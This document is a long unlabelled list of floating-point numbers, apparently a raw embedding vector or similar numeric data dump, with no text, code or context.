0.004282101523131132, 0.03962303698062897, 0.007073988206684589, 0.0021809348836541176, 0.020884763449430466, -0.017723042517900467, -0.02039165049791336, 0.0052828299812972546, 0.003546058665961027, 0.010979004204273224, 0.0030783270485699177, 0.05041349679231644, -0.03750555217266083, -0.005416985601186752, -0.01841920055449009, 0.053575217723846436, -0.0022298835683614016, -0.007208143826574087, 0.006555494852364063, -0.014677347615361214, 0.04243667796254158, 0.03834674507379532, -0.00925310980528593, -0.03095005825161934, -0.01569257862865925, 0.03863681107759476, -0.00898479949682951, -0.038694825023412704, 0.03927495703101158, -0.042929790914058685, -0.0159391351044178, -0.03042794018983841, -0.001945256139151752, -0.005050776991993189, 0.026468535885214806, 0.010036288760602474, -0.025844894349575043, 0.008440924808382988, 0.003011249238625169, 0.014314764179289341, 0.015533042140305042, 0.01170416921377182, 0.0059427302330732346, -0.019680988043546677, -0.016968870535492897, 0.00728791207075119, -0.031907275319099426, -0.04931124672293663, 0.019202379509806633, -0.022378602996468544, 0.009376388043165207, -0.011356090195477009, 0.024829663336277008, -0.010732447728514671, -0.001533724833279848, -0.024858668446540833, -0.028368469327688217, 0.006374203599989414, -0.037853632122278214, -0.03547509014606476, -0.020029067993164062, -0.030079860240221024, 0.025873901322484016, -0.04243667796254158, -0.011341586709022522, -0.019593968987464905, 0.004680942744016647, 0.018607743084430695, 0.042929790914058685, 0.005159551743417978, -0.015010923147201538, -0.017345955595374107, 0.003792614908888936, 0.04455416277050972, -0.006609882228076458, 0.020507676526904106, 0.0362582691013813, -0.0032324246130883694, 0.037041448056697845, -0.049340251833200455, -0.001329772057943046, -0.021160325035452843, -0.02967376820743084, 0.033937741070985794, 0.009499666281044483, -0.00008447043364867568, -0.005949981976300478, 0.008143607527017593, -0.01926039159297943, 0.013016718439757824, -0.01457582414150238, 0.029253171756863594, -0.02981880120933056, 0.007342299446463585, -0.042929790914058685, -0.010783209465444088, 0.012625128962099552, -0.00012769708700943738, -0.0004233153013046831, 0.018317677080631256, -0.01691085658967495, -0.0022190059535205364, 0.018071120604872704, 0.013741884380578995, -0.016417743638157845, 0.01435102242976427, -0.013154500164091587, 0.013625857420265675, 0.022973239421844482, 0.0004339661682024598, -0.0013225203147158027, -0.0051704291254282, 0.018535226583480835, -0.019347412511706352, -0.02355337142944336, -0.0025417045690119267, 0.031240124255418777, 0.0218999944627285, -0.04266873002052307, -0.0023332196287810802, 0.019086353480815887, -0.0017032321775332093, 0.015736088156700134, -0.0166062880307436, -0.01730244606733322, 0.022915225476026535, 0.005507631227374077, -0.02326330542564392, -0.019129863008856773, -0.02211754396557808, 0.014771618880331516, -0.010609169490635395, 0.02007257752120495, 0.03408277407288551, -0.0007242589490488172, -0.03828873112797737, 0.017200922593474388, -0.005630908999592066, -0.007367680314928293, 0.003792614908888936, 0.024525092914700508, 0.006747663952410221, -0.0005728806718252599, 0.009528673253953457, 0.011566387489438057, -0.001502905273810029, -0.02484416589140892, -0.02876005880534649, 0.02831045724451542, 0.048150982707738876, -0.002300587249919772, 0.022987741976976395, 0.012262546457350254, -0.02317628636956215, -0.039739061146974564, 0.0010814028792083263, 0.020058074966073036, 0.015213970094919205, -0.010065295733511448, 0.0087599977850914, 0.006493856199085712, -0.002634163247421384, 0.04046422988176346, -0.0013995692133903503, 0.0032958765514194965, -0.009796984493732452, 0.01026834174990654, 0.010065295733511448, -0.019129863008856773, -0.004133442882448435, 0.013379300944507122, -0.03585217520594597, 0.012356817722320557, 0.006896322593092918, -0.00811460055410862, 0.008462679572403431, -0.041044361889362335, 0.004158823285251856, -0.0003100082103628665, -0.011015262454748154, 0.0027175573632121086, 0.030021846294403076, 0.025467807427048683, -0.02612045779824257, -0.024554099887609482, 0.028673039749264717, 0.04243667796254158, -0.0012472844682633877, -0.01072519551962614, -0.015562049113214016, -0.004622929263859987, 0.02166794240474701, -0.021392378956079483, -0.007541719824075699, -0.016925359144806862, -0.0064177135936915874, -0.021580921486020088, 0.019680988043546677, 0.018825292587280273, 0.012632381170988083, -0.03225535526871681, 0.011617149226367474, 0.018839797005057335, 0.00789705105125904, 0.008789004758000374, 0.008803507313132286, 0.049485284835100174, 0.036055222153663635, -0.00029777103918604553, -0.006453971844166517, 0.012248042970895767, -0.014952910132706165, -0.013089234940707684, 0.007882547564804554, 0.016707809641957283, 0.00826688576489687, -0.011544632725417614, 0.0014630211517214775, 0.012762910686433315, 0.004104435909539461, -0.0022135672625154257, -0.0068528130650520325, 0.005199435632675886, -0.00006894736725371331, -0.03495297208428383, -0.01872377097606659, -0.005710677243769169, -0.012726652435958385, -0.033937741070985794, 0.00700147170573473, -0.005050776991993189, -0.0222625769674778, 0.01744747906923294, -0.014430791139602661, -0.003007623367011547, -0.00019273535872343928, 0.02024661749601364, 0.008818010799586773, -0.020406153053045273, -0.0519508495926857, 0.04899217188358307, -0.006896322593092918, 0.053285151720047, 0.007461951579898596, 0.013865161687135696, -0.03857879713177681, 0.005656289868056774, 0.01480062585324049, -0.010732447728514671, -0.009231355041265488, -0.013770890422165394, 0.028977608308196068, -0.01863675005733967, 0.020507676526904106, 0.002258890075609088, 0.019144365563988686, -0.01872377097606659, 0.004369121510535479, 0.028789065778255463, 0.01669330708682537, -0.015271983109414577, 0.0030185009818524122, -0.03208131715655327, 0.033502642065286636, 0.015039930120110512, -0.029789794236421585, 0.001162077533081174, -0.030166879296302795, -0.006087763234972954, 0.0028172675520181656, -0.022248074412345886, -0.044293101876974106, 0.004427134525030851, -0.05812925845384598, -0.0022117544431239367, 0.010674434714019299, -0.018216153606772423, 0.0029840555507689714, 0.001086841570213437, 0.008049335330724716, -0.011435857973992825, -0.017389465123414993, 0.006029750220477581, 0.007984071038663387, -0.02681661583483219, 0.00398478377610445, -0.0013651237823069096, -0.007976818829774857, 0.015344499610364437, 0.013828903436660767, -0.00018899622955359519, 0.019013836979866028, 0.00562365772202611, -0.029485223814845085, 0.0027374993078410625, -0.014481552876532078, 0.005993491970002651, 0.004383624531328678, -0.028745556250214577, 0.029963834211230278, 0.018433703109622, 0.00017698567535262555, 0.03872383013367653, -0.031008072197437286, -0.009913010522723198, 0.015504036098718643, 0.016142182052135468, -0.025366285815835, 0.009709964506328106, -0.009325627237558365, -0.006102266721427441, 0.002257077256217599, 0.003595007350668311, 0.013183506205677986, 0.019739001989364624, 0.00024293040041811764, 0.019898537546396255, -0.020058074966073036, 0.003582316916435957, 0.0087599977850914, 0.02739674784243107, -0.027686813846230507, -0.03216833621263504, -0.004985511768609285, 0.03155919909477234, -0.008781752549111843, 0.00230421288870275, 0.025264762341976166, 0.01049314346164465, 0.008310395292937756, -0.01382165215909481, 0.05302409082651138, -0.020594697445631027, 0.031298138201236725, 0.0047643366269767284, 0.008839765563607216, 0.015417016111314297, -0.006562746595591307, 0.0032124826684594154, 0.004796968773007393, -0.0052248165011405945, 0.002945984248071909, 0.030253900215029716, -0.014481552876532078, -0.011189301498234272, -0.042552705854177475, 0.01389416866004467, -0.01328502967953682, -0.022741185501217842, -0.03875283896923065, -0.01019582524895668, 0.02906462922692299, -0.020174100995063782, -0.0131399966776371, -0.00883251428604126, 0.0026250986848026514, -0.014844135381281376, 0.02883257530629635, -0.03147217631340027, 0.016026154160499573, 0.002043153392150998, -0.016490260139107704, 0.0010959061328321695, 0.011943473480641842, 0.018259664997458458, -0.011486619710922241, 0.004198707640171051, -0.014713605865836143, 0.005094286985695362, -0.009840494021773338, -0.009071818552911282, 0.009564931504428387, 0.027454761788249016, -0.01579410210251808, -0.003810744034126401, 0.016258208081126213, 0.02498919889330864, -0.005268326494842768, 0.013589599169790745, 0.0318782702088356, -0.0246991328895092, -0.04493124783039093, 0.01396668516099453, 0.029789794236421585, 0.015184963122010231, 0.03155919909477234, 0.016258208081126213, -0.005094286985695362, -0.024177012965083122, 0.0369834341108799, -0.010079799219965935, 0.003056572051718831, -0.02755628526210785, -0.008513441309332848, -0.009144335053861141, -0.024858668446540833, -0.036722373217344284, 0.00781728234142065, 0.02037714794278145, 0.0001426536327926442, 0.025801384821534157, 0.03866581991314888, -0.005710677243769169, 0.02514873631298542, -0.01841920055449009, -0.0004418976604938507, 0.030021846294403076, -0.009303871542215347, 0.02181297540664673, 0.00011075768270529807, 0.027309728786349297, 0.026613568887114525, -0.0052248165011405945, -0.0016560964286327362, -0.010587414726614952, 0.00962294451892376, -0.021943503990769386, -0.017911585047841072, 0.016185691580176353, -0.027918867766857147, -0.009724467992782593, -0.025119729340076447, 0.019651981070637703, 0.007889799773693085, 0.00925310980528593, -0.022915225476026535, 0.002864403184503317, -0.0019325657049193978, 0.015808604657649994, 0.008179865777492523, -0.008194368332624435, 0.0014766179956495762, -0.0032070439774543047, 0.005830329842865467, 0.011501123197376728, -0.02680211327970028, -0.004191455896943808, -0.029847806319594383, -0.013422811403870583, 0.0005969017511233687, 0.0012935136910527945, 0.005601902492344379, -0.033502642065286636, -0.016809333115816116, 0.009318375028669834, 0.03103707917034626, -0.005837581120431423, -0.04739680886268616, -0.002779196249321103, -0.02649754285812378, -0.016809333115816116, -0.016040658578276634, -0.023843437433242798, -0.003803492523729801, -0.04205959290266037, -0.014677347615361214, 0.04490223899483681, -0.0024256783071905375, 0.02174045890569687, -0.0126831429079175, 0.02538078837096691, -0.005670793354511261, -0.012044996954500675, -0.021348869428038597, -0.02092827297747135, 0.01917337253689766, -0.04113138094544411, -0.001659722300246358, -0.03338661417365074, 0.043306875973939896, 0.0005280110635794699, 0.006145776715129614, -0.02400297485291958, -0.0013207074953243136, 0.00781728234142065, -0.02462661638855934, -0.005746935494244099, 0.011008010245859623, -0.006653392221778631, 0.009796984493732452, -0.01775204762816429, 0.00183104258030653, 0.01888330653309822, 0.008716488257050514, 0.009782481007277966, -0.0011104095028713346, -0.03132714331150055, 0.04339389503002167, -0.01317625492811203, -0.0017440227093175054, -0.009325627237558365, 0.022755689918994904, 0.019057346507906914, 0.024728139862418175, -0.02717919833958149, -0.012074003927409649, 0.01569257862865925, -0.013604102656245232, -0.027512773871421814, -0.01857873611152172, -0.021958008408546448, -0.023147279396653175, -0.013241520151495934, -0.001284449128434062, -0.02075423300266266, 0.021247345954179764, -0.028063900768756866, -0.005848458968102932, 0.017084896564483643, 0.023466352373361588, 0.013691122643649578, 0.019666485488414764, -0.041943565011024475, -0.008034832775592804, 0.02825244329869747, 0.02213204652070999, -0.06439468264579773, 0.033415619283914566, -0.01615668460726738, -0.009506918489933014, 0.020420657470822334, 0.013147247955203056, 0.017157413065433502, 0.005286455620080233, 0.012059500440955162, 0.023089265450835228, -0.023437345400452614, -0.013538837432861328, 0.015489532612264156, 0.0029496101196855307, -0.023466352373361588, 0.004931124392896891, 0.033560652285814285, 0.0025145108811557293, -0.0028480871114879847, -0.03608423098921776, 0.00447427062317729, 0.007752018049359322, -0.011377844959497452, 0.001462114742025733, 0.009833242744207382, -0.003915892913937569, 0.020478669553995132, -0.03889787197113037, -0.023074762895703316, -0.02680211327970028, -0.02657005935907364, -0.03460489213466644, -0.0418565459549427, -0.009086322039365768, -0.012784665450453758, -0.023654894903302193, 0.001992391888052225, -0.011261817999184132, -0.027730323374271393, -0.010290096513926983, 0.03373469412326813, 0.0326034352183342, -0.01902833953499794, -0.011087778955698013, -0.006707779597491026, 0.02491668239235878, 0.012559864670038223, -0.010862977243959904, 0.043799988925457, -0.03184926509857178, 0.0012708522845059633, -0.015489532612264156, 0.013814400881528854, 0.02619297429919243, -0.014532314613461494, -0.025424297899007797, -0.020362643525004387, -0.021261848509311676, 0.010246586985886097, 0.017490988597273827, 0.008245130069553852, 0.01291519496589899, 0.007121123839169741, 0.02000006102025509, -0.002353161573410034, 0.004423508886247873, 0.015953637659549713, -0.0025906532537192106, -0.008701984770596027, -0.02453959733247757, 0.029992839321494102, -0.006026124116033316, -0.01949244551360607, -0.027280721813440323, 0.048963166773319244, -0.014517811127007008, -0.029789794236421585, -0.0019833273254334927, 0.01321251317858696, 0.007030478212982416, 0.0027701316867023706, -0.00006832417420810089, 0.016171187162399292, 0.003908641170710325, -0.0018745524575933814, -0.004543161019682884, 0.05859336256980896, -0.004956505261361599, -0.017505493015050888, -0.014604831114411354, 0.008382911793887615, -0.016185691580176353, -0.020174100995063782, -0.014104466885328293, -0.013023970648646355, -0.0016134929610416293, -0.015460525639355183, -0.009427149780094624, -0.017157413065433502, -0.027773834764957428, -0.004430760629475117, 0.023205291479825974, -0.003268682863563299, 0.019811518490314484, 0.0022806450724601746, 0.012871685437858105, -0.004535909276455641, -0.027237212285399437, 0.0306599922478199, -0.024191517382860184, -0.0011185676557943225, -0.0003054759290535003, 0.0026522923726588488, 0.015141453593969345, -0.011254566721618176, 0.003576878225430846, -0.006464849226176739, 0.02340833842754364, -0.02279919944703579, 0.0014077272498980165, 0.006838309578597546, -0.006011621095240116, -0.0037672340404242277, -0.014742611907422543, -0.01638873666524887, -0.000581038766540587, -0.010565659962594509, -0.03753456100821495, -0.0005393417668528855, 0.004532283637672663, 0.005398856475949287, 0.0753011703491211, -0.007266157306730747, 0.00705948518589139, -0.006936206948012114, 0.010471387766301632, -0.003915892913937569, -0.04704872891306877, -0.0011530129704624414, 0.005235693883150816, -0.01669330708682537, 0.014358274638652802, 0.018694764003157616, 0.009920262731611729, 0.00818711705505848, -0.0003297236398793757, 0.002273393562063575, -0.0003104614152107388, -0.0009499666630290449, 0.007171885576099157, -0.0024148006923496723, -0.004862233996391296, 0.009013805538415909, 0.032661449164152145, -0.0026921764947474003, 0.026860125362873077, -0.02606244385242462, -0.026903634890913963, -0.012973208911716938, -0.032284364104270935, -0.01712840609252453, -0.006182034965604544, -0.0076722498051822186, -0.003966654650866985, 0.0006467568455263972, 0.010021785274147987, -0.01128357369452715, 0.012726652435958385, -0.02462661638855934, -0.004604800138622522, -0.01924588903784752, 0.007081239949911833, -0.01231330819427967, -0.010587414726614952, 0.008274137042462826, -0.008310395292937756, -0.020261120051145554, 0.04620753973722458, 0.014430791139602661, 0.01773754507303238, 0.007320544682443142, 0.011276321485638618, -0.012443837709724903, 0.023451847955584526, -0.0036022590938955545, -0.000021500020011444576, 0.014445294626057148, 0.016968870535492897, 0.004180578514933586, -0.0041116876527667046, -0.015083439648151398, -0.00585208460688591, 0.015910128131508827, -0.000052376202802406624, -0.005119667388498783, -0.014510558918118477, 0.0006562746712006629, -0.0001133637415478006, 0.015083439648151398, -0.0100072817876935, 0.011312579736113548, 0.009920262731611729, -0.00093183753779158, -0.01476436760276556, -0.011261817999184132, 0.010145063512027264, 0.030630985274910927, -0.012523606419563293, 0.014242247678339481, -0.026105953380465508, -0.03460489213466644, 0.028513502329587936, 0.035533104091882706, -0.03924595192074776, 0.024583106860518456, -0.006356074474751949, 0.02137787453830242, -0.019898537546396255, -0.013205261901021004, -0.0025598336942493916, -0.01407545991241932, 0.003966654650866985, -0.017636021599173546, 0.00902105774730444, -0.002043153392150998, 0.019347412511706352, 0.0006866409676149487, 0.023495357483625412, -0.006914451718330383, 0.008876023814082146, -0.0070341043174266815, 0.0005502192070707679, 0.006624385714530945, 0.024597609415650368, -0.01773754507303238, -0.016432248055934906, 0.016113175079226494, 0.007643243297934532, 0.01918787509202957, -0.026294495910406113, 0.004659187514334917, -0.033792708069086075, -0.018912313506007195, 0.0014322015922516584, -0.03396674618124962, 0.002683111932128668, -0.0005719742039218545, 0.000715647591277957, -0.01676582358777523, -0.005377101246267557, -0.024510590359568596, -0.010674434714019299, -0.0036040719132870436, 0.020812246948480606, -0.011943473480641842, 0.015562049113214016, 0.009296620264649391, -0.00464468402788043, -0.029557740315794945, 0.025395290926098824, 0.03448886424303055, 0.0018328555161133409, -0.004082681145519018, 0.012378573417663574, -0.014996419660747051, 0.034923963248729706, -0.029282178729772568, 0.02574337087571621, 0.0001211252820212394, 0.0002970912028104067, -0.0040319194085896015, -0.014409036375582218, 0.01042062696069479, 0.045424360781908035, 0.0013850658433511853, 0.0012853556545451283, -0.013952181674540043, 0.0031635339837521315, 0.006084137596189976, 0.024293040856719017, -0.00513417087495327, 0.0038071181625127792, -0.04403204098343849, -0.011225559748709202, 0.015910128131508827, 0.006051504984498024, 0.02107330597937107, -0.015823109075427055, -0.04545336589217186, -0.0062980614602565765, 0.0014630211517214775, -0.003529742592945695, -0.02023211494088173, 0.020710723474621773, 0.007425693329423666, 0.006229170598089695, 0.03579416498541832, 0.010224832221865654, -0.0262799933552742, -0.0014983729925006628, -0.011218308471143246, -0.011015262454748154, 0.008556951768696308, -0.013517082668840885, -0.013582347892224789, -0.0060442532412707806, -0.006196537986397743, -0.004521406255662441, 0.025235755369067192, 0.024409066885709763, -0.030398933216929436, -0.013096487149596214, 0.012596122920513153, -0.01559105608612299, -0.030224893242120743, 0.034546878188848495, -0.011218308471143246, 0.0031145852990448475, 0.008194368332624435, -0.04522131383419037, 0.004470644518733025, -0.003828873159363866, 0.01653377152979374, -0.019768008962273598, -0.019724497571587563, 0.015388009138405323, -0.003466290421783924, 0.007643243297934532, -0.009274865500628948, -0.0016062413342297077, 0.006414087954908609, 0.0027846351731568575, -0.012429334223270416, -0.012886188924312592, -0.0061747832223773, 0.01631622016429901, -0.007701256312429905, -0.0324874073266983, 0.01242208294570446, -0.010674434714019299, -0.022291583940386772, -0.011203804984688759, 0.012190029956400394, 0.017679531127214432, -0.004441638011485338, 0.02046416699886322, 0.01192897092550993, 0.014264003373682499, 0.0026740473695099354, -0.042697738856077194, 0.00608051149174571, -0.014865890145301819, -0.002628724556416273, -0.0062182932160794735, 0.011312579736113548, -0.0012835427187383175, 0.025569330900907516, 0.035214029252529144, -0.006323442328721285, -0.0038796348962932825, 0.015184963122010231, -0.033328600227832794, 0.012378573417663574, 0.0071936403401196, -0.012886188924312592, 0.0003077420697081834, -0.0018673008307814598, -0.006925329566001892, -0.013865161687135696, 0.010290096513926983, -0.013430062681436539, 0.009521421045064926, 0.0026939893141388893, -0.01888330653309822, -0.001928939949721098, -0.003448161296546459, -0.000261965993558988, 0.00045798724750056863, -0.015562049113214016, -0.005844832863658667, 0.024713635444641113, 0.0018926816992461681, 0.0064177135936915874, -0.0036222010385245085, -0.0003025299229193479, -0.006363326217979193, -0.0023984843865036964, 0.0026559182442724705, -0.022480126470327377, 0.003007623367011547, 0.005250197369605303, 0.02333582192659378, -0.023277807980775833, 0.00879625603556633, 0.0049492535181343555, -0.004104435909539461, 0.040435221046209335, -0.03135615214705467, -0.005344468634575605, 0.021551914513111115, 0.0016814771806821227, 0.016055161133408546, -0.021870987489819527, 0.007277034688740969, -0.0019706368912011385, 0.01216102298349142, 0.011899963952600956, 0.012059500440955162, -0.00925310980528593, -0.021914497017860413, 0.007331422064453363, -0.005870213732123375, 0.04568541795015335, 0.02062370255589485, -0.035446085035800934, -0.005449617747217417, -0.022842708975076675, -0.017345955595374107, 0.0002875734062399715, -0.007664998061954975, -0.0010768705978989601, -0.0017730293329805136, 0.0009205067763105035, 0.003170785726979375, -0.0194054264575243, 0.02015959843993187, 0.016504764556884766, -0.017345955595374107, 0.02197251096367836, 0.0030493203084915876, -0.003529742592945695, 0.009913010522723198, 0.005790445487946272, 0.022074034437537193, -0.020710723474621773, -0.006791173946112394, -0.018767280504107475, -0.0218999944627285, 0.013263274915516376, -0.0018056618282571435, -0.018462710082530975, 0.01363310869783163, -0.01174042746424675, -0.010601918213069439, -0.045192304998636246, 0.009760726243257523, -0.011950725689530373, -0.019913041964173317, -0.00898479949682951, -0.00005141309156897478, 0.02076873555779457, 0.0045902966521680355, -0.03292251005768776, -0.013843406923115253, -0.02401747740805149, 0.00556564424186945, -0.004459767136722803, 0.005627283360809088, -0.0017911584582179785, -0.013886917382478714, -0.027135688811540604, 0.004858607891947031, 0.029340190812945366, 0.00637782970443368, -0.016519267112016678, 0.01257436815649271, 0.0009010179783217609, 0.012277049943804741, -0.007262531202286482, -0.00944165326654911, 0.008701984770596027, -0.02945621684193611, 0.018027611076831818, -0.0034082771744579077, 0.02477164939045906, 0.03965204209089279, 0.0027520025614649057, -0.005340842995792627, 0.009804235771298409, 0.00818711705505848, -0.015271983109414577, -0.0017530872719362378, 0.0017376774922013283, -0.025264762341976166, 0.01902833953499794, 0.028295952826738358, 0.028963105753064156, 0.01728794351220131, 0.00014412662130780518, 0.005968111101537943, -0.03231336921453476, -0.005130545236170292, -0.014053705148398876, -0.005358972121030092, -0.0007396686705760658, -0.008527944795787334, -0.00781728234142065, -0.026555556803941727, 0.006287184078246355, 0.014771618880331516, -0.005598276853561401, 0.0037998666521161795, -0.02062370255589485, 0.026004429906606674, 0.01669330708682537, -0.01303122192621231, -0.014438042417168617, 0.02778833732008934, -0.006145776715129614, -0.009891255758702755, 0.04113138094544411, 0.0037200984079390764, -0.010145063512027264, -0.011479368433356285, 0.013096487149596214, 0.005616405978798866, -0.002416613744571805, -0.004224088508635759, 0.023422840982675552, -0.0036874660290777683, -0.01712840609252453, 0.010021785274147987, 0.004920247010886669, 0.029485223814845085, 0.022538140416145325, -0.010710692964494228, -0.00513417087495327, 0.029035622254014015, 0.017418472096323967, -0.021334365010261536, -0.0015563862398266792, 0.01238582469522953, 0.011037017218768597, -0.017273439094424248, 0.018332181498408318, 0.010116057470440865, -0.002518136752769351, -0.003203418105840683, -0.023495357483625412, 0.016040658578276634, -0.018593240529298782, 0.0054024821147322655, -0.02150840498507023, 0.002338658319786191, -0.0016968869604170322, -0.015446022152900696, 0.002416613744571805, -0.004071803763508797, 0.000995289534330368, -0.03315456211566925, -0.009195096790790558, 0.0022806450724601746, 0.013277778401970863, -0.03518502414226532, -0.03852078318595886, -0.004267598036676645, -0.004633806645870209, 0.004651935771107674, -0.00021449032647069544, -0.006066008470952511, -0.016736816614866257, -0.007759269792586565, -0.013393804430961609, -0.010485891252756119, -0.007063110824674368, 0.0022480126935988665, -0.00024157071311492473, -0.017563505098223686, -0.02333582192659378, -0.028731051832437515, 0.004376373253762722, 0.042407672852277756, -0.02105880342423916, -0.019347412511706352, -0.0019053720170632005, 0.004728078376501799, -0.00585208460688591, -0.020870259031653404, -0.0029822427313774824, 0.0048477305099368095, -0.0008837953209877014, 0.0031961663626134396, 0.0014992794021964073, -0.011153043247759342, 0.019768008962273598, -0.003861505538225174, -0.00330312829464674, 0.005137796513736248, 0.026410523802042007, -0.007650494575500488, -0.0034608517307788134, 0.021406881511211395, -0.02868754230439663, 0.0206817165017128, 0.021348869428038597, -0.0012019616551697254, 0.005083409138023853, -0.003872383153066039, -0.0051232934929430485, -0.0030348170548677444, -0.021725954487919807, 0.03208131715655327, 0.005507631227374077, 0.007664998061954975, -0.0012654135935008526, -0.015605558641254902, -0.01042062696069479, -0.009804235771298409, -0.03602621704339981, 0.00970271322876215, 0.003040255745872855, -0.0020848505664616823, 0.010935493744909763, 0.007585229817777872, -0.0051704291254282, -0.0034880454186350107, 0.003223360050469637, 0.0014820568030700088, 0.012393075972795486, 0.007124749943614006, 0.016142182052135468, 0.011348837986588478, 0.017636021599173546, 0.006381455343216658, 0.025163238868117332, 0.0056852963753044605, 0.006323442328721285, 0.022610656917095184, 0.014176983386278152, -0.0008235159330070019, -0.022291583940386772, -0.007403938565403223, -0.016823837533593178, 0.010101553983986378, -0.0006091389223001897, -0.012255295179784298, -0.02319078892469406, -0.02182747796177864, -0.007976818829774857, 0.0079695675522089, -0.014670095406472683, -0.0050253961235284805, -0.0024891302455216646, -0.010587414726614952, -0.014372778125107288, -0.01820165105164051, 0.012015989981591702, -0.01547502912580967, 0.0011104095028713346, -0.016707809641957283, -0.011029765009880066, 0.001398662687279284, -0.016113175079226494, 0.011029765009880066, -0.019448935985565186, -0.01185645442456007, 0.010783209465444088, 0.029572244733572006, -0.004506902769207954, 0.006051504984498024, -0.012190029956400394, 0.009709964506328106, -0.004419882781803608, -0.014104466885328293, 0.009753474034368992, 0.009913010522723198, -0.015808604657649994, 0.0191008560359478, 0.005366223864257336, -0.006566372700035572, -0.009470660239458084, 0.0070341043174266815, -0.009050063788890839, 0.010942745953798294, 0.02651204541325569, -0.004035545513033867, -0.01865125447511673, 0.006841935217380524, -0.008223375305533409, -0.005616405978798866, -0.0025634595658630133, 0.012596122920513153, 0.006827432196587324, -0.01084122247993946, -0.016867347061634064, 0.011080526746809483, -0.003730975789949298, 0.004579419270157814, -0.008317646570503712, 0.006493856199085712, 0.007679501548409462, -0.01782456412911415, -0.012929698452353477, 0.006047879345715046, -0.0072335246950387955, 0.011718672700226307, 0.019042842090129852, -0.003301315475255251, 0.029659263789653778, -0.0016406866488978267, -0.011008010245859623, -0.011986983940005302, 0.01012330874800682, -0.005242945626378059, 0.007012349087744951, -0.039390984922647476, 0.01192897092550993, 0.01698337309062481, -0.033850718289613724, 0.02543880231678486, 0.0007292444352060556, 0.011457612738013268, -0.006809303071349859, -0.022697675973176956, 0.004804220516234636, -0.022088536992669106, 0.006997846066951752, 0.017911585047841072, -0.021493902429938316, -0.03947800397872925, -0.014938406646251678, 0.0017784681404009461, 0.024931184947490692, -0.022219067439436913, -0.004633806645870209, -0.024409066885709763, -0.014220492914319038, -0.010942745953798294, -0.01569257862865925, 0.0014213240938261151, 0.01886880397796631, -0.007904302328824997, 0.021638935431838036, -0.0060188728384673595, -0.007073988206684589, -0.009782481007277966, 0.010804964229464531, 0.03707045316696167, 0.0014186047483235598, -0.002911539049819112, -0.012864434160292149, 0.001731332391500473, 0.012052248232066631, 0.002726621925830841, 0.00434374064207077, -0.00872373953461647, -0.00936913676559925, 0.0027683188673108816, 0.0007478268234990537, 0.005620031617581844, -0.02333582192659378, 0.004934750497341156, -0.010587414726614952, 0.003854254027828574, 0.011182050220668316, -0.00362582691013813, 0.002320529194548726, 0.016098670661449432, -0.016475757583975792, 0.005058028735220432, 0.005819451995193958, 0.008955792523920536, 0.02408999390900135, 0.018027611076831818, -0.014699102379381657, -0.003464477602392435, 0.036809395998716354, -0.0015663572121411562, -0.006029750220477581, -0.0060623823665082455, -0.014264003373682499, -0.02498919889330864, -0.022973239421844482, -0.004303856752812862, 0.007860792800784111, -0.026758601889014244, 0.004786091390997171, 0.023234298452734947, 0.013495327904820442, -0.000998915289528668, -0.001470272778533399, -0.017186420038342476, 0.04046422988176346, -0.001666067517362535, 0.023422840982675552, -0.003042068798094988, -0.008419170044362545, -0.019057346507906914, -0.010732447728514671, -0.0013279591221362352, 0.015228472650051117, 0.01699787564575672, 0.007955064065754414, 0.005311836488544941, -0.0011312579736113548, -0.011762182228267193, 0.004256720654666424, -0.024351052939891815, 0.019579464569687843, 0.012820923700928688, 0.008926785551011562, -0.016780326142907143, 0.014894897118210793, -0.016649797558784485, -0.008564203046262264, -0.007795528043061495, -0.0008357531041838229, -0.02324880287051201, 0.001731332391500473, -0.005116041749715805, 0.012139268219470978, 0.01363310869783163, 0.01324877142906189, -0.004227714147418737, -0.001290794345550239, 0.0033067541662603617, -0.02250913344323635, -0.009129832498729229, -0.016345227137207985, 0.003988409414887428, -0.02423502691090107, 0.020333636552095413, -0.011979731731116772, 0.02295873686671257, 0.006131273228675127, 0.01962297596037388, -0.027904363349080086, -0.01159539446234703, 0.02529376931488514, -0.009332878515124321, 0.0014467049622908235, -0.001463927561417222, -0.015982644632458687, 0.005058028735220432, 0.010101553983986378, -0.009942017495632172, 0.023654894903302193, 0.00021029796334914863, 0.013205261901021004, -0.005195809993892908, -0.005844832863658667, 0.009796984493732452, -0.014981917105615139, 0.019651981070637703, 0.010732447728514671, 0.010957248508930206, 0.0111312884837389, -0.0012835427187383175, -0.026671582832932472, 0.017708538100123405, -0.009209600277245045, -0.012030493468046188, 0.03245840221643448, -0.007291537709534168, -0.00898479949682951, -0.00997102353721857, 0.009521421045064926, -0.014017446897923946, -0.0030021846760064363, -0.021348869428038597, 0.00023635859542991966, 0.0007609704043716192, 0.00905731599777937, 0.023495357483625412, 0.0040282937698066235, -0.000023157137547968887, 0.009028309024870396, -0.01926039159297943, 0.0006531020626425743, -0.014133472926914692, 0.0018944945186376572, 0.031066084280610085, 0.010029037483036518, 0.00702322693541646, 0.01931840553879738, -0.006051504984498024, -0.0006893603131175041, 0.001150293624959886, 0.024742642417550087, -0.028136417269706726, 0.021493902429938316, -0.01654827408492565, 0.001617118832655251, -0.031820256263017654, 0.014068208634853363, 0.008172613568603992, -0.009767977520823479, -0.002157367067411542, -0.006943458691239357, -0.0009789732284843922, -0.005844832863658667, 0.009390891529619694, 0.005221190862357616, -0.004463392775505781, 0.023886946961283684, 0.0042313397862017155, -0.010203076526522636, 0.009419898502528667, -0.025569330900907516, -0.017650526016950607, -0.007585229817777872, -0.008963043801486492, 0.0015835799276828766, 0.020348140969872475, -0.008172613568603992, -0.0008058400126174092, 0.015678076073527336, -0.002534453058615327, -0.03611323609948158, -0.004292978905141354, -0.029731780290603638, 0.012516354210674763, -0.006134899333119392, -0.014264003373682499, -0.002697615185752511, 0.04675866290926933, 0.0062182932160794735, -0.0013841594336554408, 0.02092827297747135, 0.012654135935008526, -0.009137083776295185, 0.0027556284330785275, -0.01569257862865925, -0.007635991554707289, -0.005812200717628002, 0.0028372094966471195, 0.007015975192189217, -0.011609897948801517, 0.013683870434761047, 0.018143637105822563, -0.019303902983665466, -0.008245130069553852, -0.0401451550424099, 0.0011122224386781454, 0.009651951491832733, 0.022074034437537193, 0.020971782505512238, 0.0023984843865036964, -0.000995289534330368, -0.008767249062657356, -0.0038324990309774876, -0.008622216060757637, 0.003187101799994707, -0.006515610963106155, 0.02159542590379715, 0.0028517127502709627, -0.009564931504428387, -0.0042857276275753975, 0.004593922756612301, 0.036867406219244, -0.002403923310339451, 0.012052248232066631, -0.000405866012442857, -0.00006486831262009218, -0.015199466608464718, -0.004677316639572382, -0.001578141120262444, 0.014249499887228012, -0.009383640252053738, -0.00556564424186945, -0.015373505651950836, -0.025873901322484016, 